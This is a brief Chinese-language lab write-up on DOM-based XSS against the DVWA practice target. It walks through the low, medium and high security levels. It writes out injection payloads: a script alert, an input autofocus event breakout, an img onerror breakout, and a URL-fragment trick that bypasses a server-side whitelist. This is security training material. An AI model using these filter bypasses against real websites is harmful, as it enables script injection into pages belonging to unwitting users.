XSS DOM型
以下ip均为dwva靶场的ip地址,这里我搭建在虚拟机win2008中
低级
查看源码:
-
default=<script>alert('xss')</script>
按F12查看代码
中级
查看源码
- 发现过滤了
<script>
标签
- stripos函数,在default中查找是否有<script,不区分大小写
方法1 利用input标签的自动聚焦
-
default = "><input onfocus = alert('xss') autofocus/>
-
第一个双引号结束value,>闭合option标签,再加上input
方法2 利用img标签的onerror事件
-
default=</option></select><img src =1 one rror=alert('xss')>
-
首先闭合option标签,在闭合select标签,在利用img标签的onerror事件
高级
查看源码:
发现它采用了白名单的方式来防止注入
English#<script>alert('xss')</script>
这里利用#绕过服务器端的业务操作
(注意#这个方法仅适用于DOM型xss注入)